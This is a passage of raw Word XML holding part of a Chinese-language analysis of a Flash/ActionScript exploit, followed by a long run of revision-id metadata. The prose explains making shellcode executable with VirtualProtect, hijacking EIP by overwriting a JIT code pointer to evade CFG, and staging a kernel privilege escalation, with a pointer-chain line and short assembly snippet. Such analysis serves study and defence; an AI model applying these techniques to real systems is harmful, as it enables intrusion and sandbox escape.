        <w:t>object指针不会从apply向call传递。在call看来传过来参数包含了object指针和参数，所以数组的第一个参数就作为了object指针，也就是这种传递过程会吃掉一个参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096622D" w:rsidRDefault="00113794" w:rsidP="00113794">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00113794">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00113794">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>VirtualProtect后再恢复修改过的虚函数表和Payload内存就可以执行shellcode了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C55792" w:rsidRDefault="00C55792" w:rsidP="0011379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5) </w:t>
      </w:r>
      <w:r w:rsidRPr="003A18CA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执行shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA7843" w:rsidRDefault="002F7D61" w:rsidP="00EA7843">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>修改了shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>code内存的执行属性后，下面就需要劫持EIP并将EIP指向shellcode，</w:t>
      </w:r>
      <w:r w:rsidR="0098345C">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其实劫持EIP的方法在4)中已经阐述，即修改Payload函数对象vtable，并通过Payload</w:t>
      </w:r>
      <w:r w:rsidR="0098345C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0098345C">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>call劫持EIP，但exploit程序却另辟蹊径，通过如下代码来执行</w:t>
      </w:r>
      <w:r w:rsidR="0011123E">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shellcode：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011123E" w:rsidRDefault="00701612" w:rsidP="00EA7843">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42853148" wp14:editId="133D3E01">
            <wp:extent cx="5190476" cy="18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5C" w:rsidRDefault="00A13F3D" w:rsidP="00EA7843">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里比较难以理解的是：</w:t>
      </w:r>
      <w:r w:rsidR="00186899">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00A13F3D">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ayAddr = Get(Get(payAddr + 0x1c) + 8) + 4;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006803D7" w:rsidRDefault="006803D7" w:rsidP="006803D7">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006803D7">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Payload对象+0x1C存储了MethodEnv指针，MethodEnv的+8指向MethodInfo，MethodInfo+4就是_implGPR，存储JIT后的代码地址。</w:t>
      </w:r>
      <w:r w:rsidR="00DE15D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因此pa</w:t>
      </w:r>
      <w:r w:rsidR="00DE15D2">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>yAddr</w:t>
      </w:r>
      <w:r w:rsidR="00DE15D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>存放的就是</w:t>
      </w:r>
      <w:r w:rsidR="00DE15D2" w:rsidRPr="006803D7">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Payload</w:t>
      </w:r>
      <w:r w:rsidR="00DE15D2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象JIT后的地址，从而实现了EIP劫持。</w:t>
      </w:r>
      <w:r w:rsidR="00ED3EC6" w:rsidRPr="00ED3EC6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>虽然触发条件仍然是Payload.call，但上次是替换了ExecMgr的虚函数call，而这次是直接替换了JIT后的代码地址。JIT代码调用不在CFG监测的范围，而ExecMgr的虚函数表可能是过于频繁使用，出于性能考虑，也没有CFG的守护。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E0327" w:rsidRDefault="002E0327" w:rsidP="006803D7">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E0327">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>其实用</w:t>
      </w:r>
      <w:r w:rsidRPr="002E0327">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JIT的方法调用shellcode的好处还在于，shellcode可以可以返回需要的结果让AS3获取以指导下一步操作，比如EAX存储了CreateProcessA的执行结果，返回前构造一段类似下面的代码，让EAX转化为atom：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0162" w:rsidRPr="00AF0162" w:rsidRDefault="00AF0162" w:rsidP="00AF0162">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0162">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>04DDE32D  SHL EAX,3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0162" w:rsidRPr="00AF0162" w:rsidRDefault="00AF0162" w:rsidP="00AF0162">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0162">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>04DDE330  ADD EAX,6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0162" w:rsidRPr="00AF0162" w:rsidRDefault="00AF0162" w:rsidP="00AF0162">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0162">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>04DDE333  LEAVE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0162" w:rsidRDefault="00AF0162" w:rsidP="00AF0162">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0162">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>04DDE334  RETN</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AF0162" w:rsidRDefault="00AF0162" w:rsidP="00AF0162">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF0162">
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>res = Payload.call(null)后，AS3可以根据进程创建情况判断沙箱的限制，以决定是否进一步部署内核漏洞利用代码进行权限提升。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D67A8" w:rsidRDefault="006D67A8" w:rsidP="00AF0162">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>最终exploit效果：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006D67A8" w:rsidRPr="004B1348" w:rsidRDefault="0025458D" w:rsidP="00AF016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F50BB0B" wp14:editId="3A522A1D">
            <wp:extent cx="6645910" cy="48825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A8" w:rsidRPr="004B1348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5A"/>
    <w:rsid w:val="00000F6A"/>
    <w:rsid w:val="00006967"/>
    <w:rsid w:val="0001199B"/>
    <w:rsid w:val="000223CF"/>
    <w:rsid w:val="0002338C"/>
    <w:rsid w:val="00024B34"/>
    <w:rsid w:val="0003128A"/>
    <w:rsid w:val="00034740"/>
    <w:rsid w:val="00035991"/>
    <w:rsid w:val="000375B1"/>
    <w:rsid w:val="00042560"/>
    <w:rsid w:val="00042826"/>
    <w:rsid w:val="0004489A"/>
    <w:rsid w:val="00052E31"/>
    <w:rsid w:val="00054454"/>
    <w:rsid w:val="00057376"/>
    <w:rsid w:val="00057BCE"/>
    <w:rsid w:val="00057CF4"/>
    <w:rsid w:val="000638A4"/>
    <w:rsid w:val="00063E3E"/>
    <w:rsid w:val="00074A08"/>
    <w:rsid w:val="00074A85"/>
    <w:rsid w:val="00082621"/>
    <w:rsid w:val="00085B00"/>
    <w:rsid w:val="00091B42"/>
    <w:rsid w:val="0009564F"/>
    <w:rsid w:val="00095C8E"/>
    <w:rsid w:val="000A1383"/>
    <w:rsid w:val="000A604F"/>
    <w:rsid w:val="000B0CDF"/>
    <w:rsid w:val="000B3C03"/>
    <w:rsid w:val="000B44C0"/>
    <w:rsid w:val="000B4736"/>
    <w:rsid w:val="000B4F9D"/>
    <w:rsid w:val="000B5B05"/>
    <w:rsid w:val="000C369B"/>
    <w:rsid w:val="000C418A"/>
    <w:rsid w:val="000C4634"/>
    <w:rsid w:val="000C6D0D"/>
    <w:rsid w:val="000C7FCE"/>
    <w:rsid w:val="000D22B7"/>
    <w:rsid w:val="000E0CB7"/>
    <w:rsid w:val="000E189A"/>
    <w:rsid w:val="000E1D57"/>
    <w:rsid w:val="000E38BB"/>
    <w:rsid w:val="000E3EC9"/>
    <w:rsid w:val="000E4C3D"/>
    <w:rsid w:val="000E6DB1"/>
    <w:rsid w:val="000F44A0"/>
    <w:rsid w:val="000F56F8"/>
    <w:rsid w:val="001004CE"/>
    <w:rsid w:val="001042E5"/>
    <w:rsid w:val="00106079"/>
    <w:rsid w:val="001065D4"/>
    <w:rsid w:val="0011123E"/>
    <w:rsid w:val="00113794"/>
    <w:rsid w:val="00114BB5"/>
    <w:rsid w:val="00114D5B"/>
    <w:rsid w:val="00114E32"/>
    <w:rsid w:val="0012288F"/>
    <w:rsid w:val="00122C1B"/>
    <w:rsid w:val="00126C85"/>
    <w:rsid w:val="00127296"/>
    <w:rsid w:val="001323DB"/>
    <w:rsid w:val="001345FB"/>
    <w:rsid w:val="00134702"/>
    <w:rsid w:val="00144120"/>
    <w:rsid w:val="0014495C"/>
    <w:rsid w:val="00146232"/>
    <w:rsid w:val="00151AFD"/>
    <w:rsid w:val="00151B27"/>
    <w:rsid w:val="00154E02"/>
    <w:rsid w:val="00155B59"/>
    <w:rsid w:val="00162BA6"/>
    <w:rsid w:val="001669DB"/>
    <w:rsid w:val="00170654"/>
    <w:rsid w:val="00171611"/>
    <w:rsid w:val="0017381F"/>
    <w:rsid w:val="001807D9"/>
    <w:rsid w:val="001816B6"/>
    <w:rsid w:val="001829A7"/>
    <w:rsid w:val="00184582"/>
    <w:rsid w:val="00186899"/>
    <w:rsid w:val="00186EF7"/>
    <w:rsid w:val="001909E0"/>
    <w:rsid w:val="0019459F"/>
    <w:rsid w:val="001957B1"/>
    <w:rsid w:val="001A1231"/>
    <w:rsid w:val="001A1306"/>
    <w:rsid w:val="001B1100"/>
    <w:rsid w:val="001B12E7"/>
    <w:rsid w:val="001B6194"/>
    <w:rsid w:val="001C1217"/>
    <w:rsid w:val="001C1379"/>
    <w:rsid w:val="001C187B"/>
    <w:rsid w:val="001C388B"/>
    <w:rsid w:val="001C4A0F"/>
    <w:rsid w:val="001D08EE"/>
    <w:rsid w:val="001D1901"/>
    <w:rsid w:val="001D2E20"/>
    <w:rsid w:val="001D4B5F"/>
    <w:rsid w:val="001D5006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3A18"/>
    <w:rsid w:val="001F597C"/>
    <w:rsid w:val="001F78E3"/>
    <w:rsid w:val="001F7AC3"/>
    <w:rsid w:val="001F7BC0"/>
    <w:rsid w:val="00203837"/>
    <w:rsid w:val="00204B45"/>
    <w:rsid w:val="00204E92"/>
    <w:rsid w:val="00206D92"/>
    <w:rsid w:val="002142DF"/>
    <w:rsid w:val="00215C31"/>
    <w:rsid w:val="00217286"/>
    <w:rsid w:val="00220C70"/>
    <w:rsid w:val="002331B9"/>
    <w:rsid w:val="00233E1B"/>
    <w:rsid w:val="002368AF"/>
    <w:rsid w:val="00244C81"/>
    <w:rsid w:val="00246013"/>
    <w:rsid w:val="00250271"/>
    <w:rsid w:val="00252317"/>
    <w:rsid w:val="002527A6"/>
    <w:rsid w:val="0025458D"/>
    <w:rsid w:val="00255F8D"/>
    <w:rsid w:val="002569F2"/>
    <w:rsid w:val="00256A8B"/>
    <w:rsid w:val="00257EBC"/>
    <w:rsid w:val="00262D0F"/>
    <w:rsid w:val="002647A6"/>
    <w:rsid w:val="00265202"/>
    <w:rsid w:val="00265964"/>
    <w:rsid w:val="00265A20"/>
    <w:rsid w:val="00276D20"/>
    <w:rsid w:val="00280F06"/>
    <w:rsid w:val="00281640"/>
    <w:rsid w:val="002824A7"/>
    <w:rsid w:val="00286407"/>
    <w:rsid w:val="00286A7A"/>
    <w:rsid w:val="00290543"/>
    <w:rsid w:val="00291946"/>
    <w:rsid w:val="00294C06"/>
    <w:rsid w:val="002966D9"/>
    <w:rsid w:val="002979D8"/>
    <w:rsid w:val="002A0B01"/>
    <w:rsid w:val="002A0DBD"/>
    <w:rsid w:val="002B06A2"/>
    <w:rsid w:val="002B1CAA"/>
    <w:rsid w:val="002B31D1"/>
    <w:rsid w:val="002B605B"/>
    <w:rsid w:val="002B7149"/>
    <w:rsid w:val="002C1475"/>
    <w:rsid w:val="002C203F"/>
    <w:rsid w:val="002C40BC"/>
    <w:rsid w:val="002D193C"/>
    <w:rsid w:val="002D29D5"/>
    <w:rsid w:val="002D59DB"/>
    <w:rsid w:val="002D61FC"/>
    <w:rsid w:val="002D73E3"/>
    <w:rsid w:val="002E0327"/>
    <w:rsid w:val="002E1291"/>
    <w:rsid w:val="002E5B58"/>
    <w:rsid w:val="002E6B84"/>
    <w:rsid w:val="002F2C50"/>
    <w:rsid w:val="002F4D4B"/>
    <w:rsid w:val="002F7D61"/>
    <w:rsid w:val="003012F6"/>
    <w:rsid w:val="00302660"/>
    <w:rsid w:val="003054B4"/>
    <w:rsid w:val="00311CE8"/>
    <w:rsid w:val="00312C19"/>
    <w:rsid w:val="00316431"/>
    <w:rsid w:val="00321123"/>
    <w:rsid w:val="00325B1C"/>
    <w:rsid w:val="003327EF"/>
    <w:rsid w:val="00340C6C"/>
    <w:rsid w:val="00343D35"/>
    <w:rsid w:val="00346C35"/>
    <w:rsid w:val="0035425C"/>
    <w:rsid w:val="0035462E"/>
    <w:rsid w:val="00357A8F"/>
    <w:rsid w:val="00362DF8"/>
    <w:rsid w:val="00365D8E"/>
    <w:rsid w:val="003711C4"/>
    <w:rsid w:val="00371254"/>
    <w:rsid w:val="003739ED"/>
    <w:rsid w:val="00375014"/>
    <w:rsid w:val="00375367"/>
    <w:rsid w:val="00375A33"/>
    <w:rsid w:val="00375F01"/>
    <w:rsid w:val="00377068"/>
    <w:rsid w:val="00377E1B"/>
    <w:rsid w:val="00377E21"/>
    <w:rsid w:val="00386C95"/>
    <w:rsid w:val="00392717"/>
    <w:rsid w:val="00393995"/>
    <w:rsid w:val="003944D5"/>
    <w:rsid w:val="00395091"/>
    <w:rsid w:val="00396741"/>
    <w:rsid w:val="00397489"/>
    <w:rsid w:val="003A14A1"/>
    <w:rsid w:val="003A18CA"/>
    <w:rsid w:val="003A484E"/>
    <w:rsid w:val="003A603C"/>
    <w:rsid w:val="003B0961"/>
    <w:rsid w:val="003B3906"/>
    <w:rsid w:val="003B52A3"/>
    <w:rsid w:val="003C028E"/>
    <w:rsid w:val="003C0AF0"/>
    <w:rsid w:val="003C158C"/>
    <w:rsid w:val="003C198C"/>
    <w:rsid w:val="003C24BD"/>
    <w:rsid w:val="003C34D0"/>
    <w:rsid w:val="003D01F4"/>
    <w:rsid w:val="003D171C"/>
    <w:rsid w:val="003D19BA"/>
    <w:rsid w:val="003D35F2"/>
    <w:rsid w:val="003D3C81"/>
    <w:rsid w:val="003D51AA"/>
    <w:rsid w:val="003D563D"/>
    <w:rsid w:val="003D7B33"/>
    <w:rsid w:val="003E0DC6"/>
    <w:rsid w:val="003E1292"/>
    <w:rsid w:val="003E647D"/>
    <w:rsid w:val="003F091A"/>
    <w:rsid w:val="003F2151"/>
    <w:rsid w:val="004025A1"/>
    <w:rsid w:val="00403F56"/>
    <w:rsid w:val="004074F9"/>
    <w:rsid w:val="00407D82"/>
    <w:rsid w:val="00410BDB"/>
    <w:rsid w:val="004116A1"/>
    <w:rsid w:val="004123C7"/>
    <w:rsid w:val="00414337"/>
    <w:rsid w:val="00420596"/>
    <w:rsid w:val="00421E8D"/>
    <w:rsid w:val="004225AC"/>
    <w:rsid w:val="00431216"/>
    <w:rsid w:val="00431D0F"/>
    <w:rsid w:val="00431E6C"/>
    <w:rsid w:val="00436EF8"/>
    <w:rsid w:val="00440713"/>
    <w:rsid w:val="0044104E"/>
    <w:rsid w:val="00441397"/>
    <w:rsid w:val="00443330"/>
    <w:rsid w:val="004437AF"/>
    <w:rsid w:val="004450BD"/>
    <w:rsid w:val="004478A5"/>
    <w:rsid w:val="0045160D"/>
    <w:rsid w:val="00453F18"/>
    <w:rsid w:val="00460996"/>
    <w:rsid w:val="00460E0E"/>
    <w:rsid w:val="00462D6A"/>
    <w:rsid w:val="00462FDE"/>
    <w:rsid w:val="004648A0"/>
    <w:rsid w:val="00466C7F"/>
    <w:rsid w:val="00472A3F"/>
    <w:rsid w:val="0047537A"/>
    <w:rsid w:val="004777DB"/>
    <w:rsid w:val="004826E6"/>
    <w:rsid w:val="00486E4D"/>
    <w:rsid w:val="00487B62"/>
    <w:rsid w:val="0049174A"/>
    <w:rsid w:val="00491C20"/>
    <w:rsid w:val="00492C50"/>
    <w:rsid w:val="004A1D37"/>
    <w:rsid w:val="004A2AC4"/>
    <w:rsid w:val="004A3069"/>
    <w:rsid w:val="004A6CC9"/>
    <w:rsid w:val="004B1348"/>
    <w:rsid w:val="004B2245"/>
    <w:rsid w:val="004B2E8E"/>
    <w:rsid w:val="004B6F54"/>
    <w:rsid w:val="004B721A"/>
    <w:rsid w:val="004D04B6"/>
    <w:rsid w:val="004D42E7"/>
    <w:rsid w:val="004D6438"/>
    <w:rsid w:val="004E0F53"/>
    <w:rsid w:val="004E1301"/>
    <w:rsid w:val="004E1861"/>
    <w:rsid w:val="004E1B5B"/>
    <w:rsid w:val="004E1F60"/>
    <w:rsid w:val="004E2179"/>
    <w:rsid w:val="004E33CE"/>
    <w:rsid w:val="004E48F0"/>
    <w:rsid w:val="004E4C82"/>
    <w:rsid w:val="004E5F18"/>
    <w:rsid w:val="004F3BE9"/>
    <w:rsid w:val="004F412D"/>
    <w:rsid w:val="004F5573"/>
    <w:rsid w:val="004F57C1"/>
    <w:rsid w:val="004F7E4A"/>
    <w:rsid w:val="004F7F93"/>
    <w:rsid w:val="00502FBD"/>
    <w:rsid w:val="00506597"/>
    <w:rsid w:val="00510F10"/>
    <w:rsid w:val="005126F3"/>
    <w:rsid w:val="00522560"/>
    <w:rsid w:val="00524D3E"/>
    <w:rsid w:val="00530171"/>
    <w:rsid w:val="00531A3A"/>
    <w:rsid w:val="00531D8E"/>
    <w:rsid w:val="00535B9F"/>
    <w:rsid w:val="00536470"/>
    <w:rsid w:val="00536C3D"/>
    <w:rsid w:val="005425C1"/>
    <w:rsid w:val="00542794"/>
    <w:rsid w:val="00545A6B"/>
    <w:rsid w:val="00546913"/>
    <w:rsid w:val="00546A5C"/>
    <w:rsid w:val="00547429"/>
    <w:rsid w:val="005516F3"/>
    <w:rsid w:val="00552A3F"/>
    <w:rsid w:val="00556850"/>
    <w:rsid w:val="0055708D"/>
    <w:rsid w:val="005601B5"/>
    <w:rsid w:val="005618D4"/>
    <w:rsid w:val="00561D2E"/>
    <w:rsid w:val="00562F6F"/>
    <w:rsid w:val="005648B7"/>
    <w:rsid w:val="005650B4"/>
    <w:rsid w:val="0056725C"/>
    <w:rsid w:val="00567385"/>
    <w:rsid w:val="00570A00"/>
    <w:rsid w:val="00573175"/>
    <w:rsid w:val="0057373D"/>
    <w:rsid w:val="00573D78"/>
    <w:rsid w:val="00576088"/>
    <w:rsid w:val="00577631"/>
    <w:rsid w:val="00580A67"/>
    <w:rsid w:val="0058233B"/>
    <w:rsid w:val="005862A0"/>
    <w:rsid w:val="0058668E"/>
    <w:rsid w:val="00587818"/>
    <w:rsid w:val="0059297F"/>
    <w:rsid w:val="00592E77"/>
    <w:rsid w:val="00593927"/>
    <w:rsid w:val="00593E5B"/>
    <w:rsid w:val="0059498D"/>
    <w:rsid w:val="005A3446"/>
    <w:rsid w:val="005A36B9"/>
    <w:rsid w:val="005A4952"/>
    <w:rsid w:val="005B3786"/>
    <w:rsid w:val="005B4054"/>
    <w:rsid w:val="005B4898"/>
    <w:rsid w:val="005B64E2"/>
    <w:rsid w:val="005C2FD0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2F03"/>
    <w:rsid w:val="005E6EB5"/>
    <w:rsid w:val="005F2618"/>
    <w:rsid w:val="005F5C44"/>
    <w:rsid w:val="005F70D3"/>
    <w:rsid w:val="005F7865"/>
    <w:rsid w:val="00600AAF"/>
    <w:rsid w:val="0060731E"/>
    <w:rsid w:val="00611DD5"/>
    <w:rsid w:val="00611E69"/>
    <w:rsid w:val="00613463"/>
    <w:rsid w:val="00620953"/>
    <w:rsid w:val="00620DA7"/>
    <w:rsid w:val="00621711"/>
    <w:rsid w:val="00624D19"/>
    <w:rsid w:val="00626221"/>
    <w:rsid w:val="0062684E"/>
    <w:rsid w:val="00626D7D"/>
    <w:rsid w:val="00627606"/>
    <w:rsid w:val="006321CE"/>
    <w:rsid w:val="00632A05"/>
    <w:rsid w:val="00633DF3"/>
    <w:rsid w:val="00634901"/>
    <w:rsid w:val="00637C89"/>
    <w:rsid w:val="00637E9C"/>
    <w:rsid w:val="00641A69"/>
    <w:rsid w:val="00645C1B"/>
    <w:rsid w:val="00647EC8"/>
    <w:rsid w:val="006500B6"/>
    <w:rsid w:val="00651D28"/>
    <w:rsid w:val="00652793"/>
    <w:rsid w:val="00653646"/>
    <w:rsid w:val="00653F22"/>
    <w:rsid w:val="006540F4"/>
    <w:rsid w:val="00657324"/>
    <w:rsid w:val="00660DAF"/>
    <w:rsid w:val="00662A8F"/>
    <w:rsid w:val="0066386D"/>
    <w:rsid w:val="00665D20"/>
    <w:rsid w:val="006803D7"/>
    <w:rsid w:val="006809E5"/>
    <w:rsid w:val="0068235F"/>
    <w:rsid w:val="00683B97"/>
    <w:rsid w:val="00686B05"/>
    <w:rsid w:val="00686EAC"/>
    <w:rsid w:val="00691222"/>
    <w:rsid w:val="00693882"/>
    <w:rsid w:val="00694A1A"/>
    <w:rsid w:val="0069556A"/>
    <w:rsid w:val="00697FBA"/>
    <w:rsid w:val="006A07AE"/>
    <w:rsid w:val="006A0DE9"/>
    <w:rsid w:val="006A14F8"/>
    <w:rsid w:val="006A2499"/>
    <w:rsid w:val="006A268B"/>
    <w:rsid w:val="006A3AB0"/>
    <w:rsid w:val="006A57F6"/>
    <w:rsid w:val="006A5D0B"/>
    <w:rsid w:val="006B009A"/>
    <w:rsid w:val="006B0748"/>
    <w:rsid w:val="006B245B"/>
    <w:rsid w:val="006B24AA"/>
    <w:rsid w:val="006B2E3E"/>
    <w:rsid w:val="006C0FBB"/>
    <w:rsid w:val="006C42FE"/>
    <w:rsid w:val="006C5239"/>
    <w:rsid w:val="006C54A9"/>
    <w:rsid w:val="006D104A"/>
    <w:rsid w:val="006D207B"/>
    <w:rsid w:val="006D2216"/>
    <w:rsid w:val="006D3ABF"/>
    <w:rsid w:val="006D59D8"/>
    <w:rsid w:val="006D67A8"/>
    <w:rsid w:val="006E5A5F"/>
    <w:rsid w:val="006E7496"/>
    <w:rsid w:val="006F11CE"/>
    <w:rsid w:val="00701612"/>
    <w:rsid w:val="007042C8"/>
    <w:rsid w:val="0070672F"/>
    <w:rsid w:val="00707FB3"/>
    <w:rsid w:val="00710D21"/>
    <w:rsid w:val="00711686"/>
    <w:rsid w:val="00711766"/>
    <w:rsid w:val="00711A87"/>
    <w:rsid w:val="00722E9F"/>
    <w:rsid w:val="007247E4"/>
    <w:rsid w:val="00725056"/>
    <w:rsid w:val="00727557"/>
    <w:rsid w:val="00730CC7"/>
    <w:rsid w:val="00731F5E"/>
    <w:rsid w:val="00732352"/>
    <w:rsid w:val="00735370"/>
    <w:rsid w:val="00735B85"/>
    <w:rsid w:val="00740BC6"/>
    <w:rsid w:val="0075202C"/>
    <w:rsid w:val="00753ADB"/>
    <w:rsid w:val="007571F3"/>
    <w:rsid w:val="0076077A"/>
    <w:rsid w:val="0076092F"/>
    <w:rsid w:val="0076095A"/>
    <w:rsid w:val="00763BF8"/>
    <w:rsid w:val="00763F0E"/>
    <w:rsid w:val="00767798"/>
    <w:rsid w:val="007737DD"/>
    <w:rsid w:val="00774FAA"/>
    <w:rsid w:val="00777D50"/>
    <w:rsid w:val="00791A05"/>
    <w:rsid w:val="00791A8F"/>
    <w:rsid w:val="00793067"/>
    <w:rsid w:val="00797873"/>
    <w:rsid w:val="007A0FD8"/>
    <w:rsid w:val="007A5361"/>
    <w:rsid w:val="007A5B2A"/>
    <w:rsid w:val="007A61B1"/>
    <w:rsid w:val="007A78E3"/>
    <w:rsid w:val="007A7CED"/>
    <w:rsid w:val="007B1230"/>
    <w:rsid w:val="007C08BB"/>
    <w:rsid w:val="007C1AB5"/>
    <w:rsid w:val="007C583F"/>
    <w:rsid w:val="007C68CC"/>
    <w:rsid w:val="007D3F93"/>
    <w:rsid w:val="007D4F00"/>
    <w:rsid w:val="007D6012"/>
    <w:rsid w:val="007E07DE"/>
    <w:rsid w:val="007E4535"/>
    <w:rsid w:val="007E5BBF"/>
    <w:rsid w:val="007E6495"/>
    <w:rsid w:val="007F0848"/>
    <w:rsid w:val="007F0D9E"/>
    <w:rsid w:val="007F2BA2"/>
    <w:rsid w:val="007F4518"/>
    <w:rsid w:val="007F5132"/>
    <w:rsid w:val="007F6945"/>
    <w:rsid w:val="0080061B"/>
    <w:rsid w:val="00800847"/>
    <w:rsid w:val="00800AE8"/>
    <w:rsid w:val="00804348"/>
    <w:rsid w:val="008127C6"/>
    <w:rsid w:val="00815303"/>
    <w:rsid w:val="00816876"/>
    <w:rsid w:val="00822B87"/>
    <w:rsid w:val="0082420A"/>
    <w:rsid w:val="00824301"/>
    <w:rsid w:val="008276B4"/>
    <w:rsid w:val="00833F81"/>
    <w:rsid w:val="008341E5"/>
    <w:rsid w:val="00834565"/>
    <w:rsid w:val="008400FC"/>
    <w:rsid w:val="008415FD"/>
    <w:rsid w:val="008417BB"/>
    <w:rsid w:val="008432AE"/>
    <w:rsid w:val="00843B56"/>
    <w:rsid w:val="00844F8F"/>
    <w:rsid w:val="008466EA"/>
    <w:rsid w:val="0084701A"/>
    <w:rsid w:val="008504E6"/>
    <w:rsid w:val="008558D8"/>
    <w:rsid w:val="008565A7"/>
    <w:rsid w:val="00861A80"/>
    <w:rsid w:val="008679D9"/>
    <w:rsid w:val="00871880"/>
    <w:rsid w:val="00872908"/>
    <w:rsid w:val="00872F12"/>
    <w:rsid w:val="00877B38"/>
    <w:rsid w:val="00880B7D"/>
    <w:rsid w:val="0088410A"/>
    <w:rsid w:val="00887253"/>
    <w:rsid w:val="00890221"/>
    <w:rsid w:val="008910B2"/>
    <w:rsid w:val="008936A5"/>
    <w:rsid w:val="00896315"/>
    <w:rsid w:val="00897FCD"/>
    <w:rsid w:val="008A64BF"/>
    <w:rsid w:val="008B19E7"/>
    <w:rsid w:val="008B1D1B"/>
    <w:rsid w:val="008B241E"/>
    <w:rsid w:val="008B2FB6"/>
    <w:rsid w:val="008B7F5B"/>
    <w:rsid w:val="008C1CB9"/>
    <w:rsid w:val="008D1C5A"/>
    <w:rsid w:val="008D6870"/>
    <w:rsid w:val="008D79C1"/>
    <w:rsid w:val="008E0A2E"/>
    <w:rsid w:val="008E0F01"/>
    <w:rsid w:val="008E3E9C"/>
    <w:rsid w:val="008E76A0"/>
    <w:rsid w:val="008F2B25"/>
    <w:rsid w:val="008F5626"/>
    <w:rsid w:val="008F7B2B"/>
    <w:rsid w:val="00900199"/>
    <w:rsid w:val="009008A9"/>
    <w:rsid w:val="00902CF2"/>
    <w:rsid w:val="00905C8F"/>
    <w:rsid w:val="0091391A"/>
    <w:rsid w:val="00913A2E"/>
    <w:rsid w:val="0091620C"/>
    <w:rsid w:val="00916D90"/>
    <w:rsid w:val="0092041C"/>
    <w:rsid w:val="00924AFB"/>
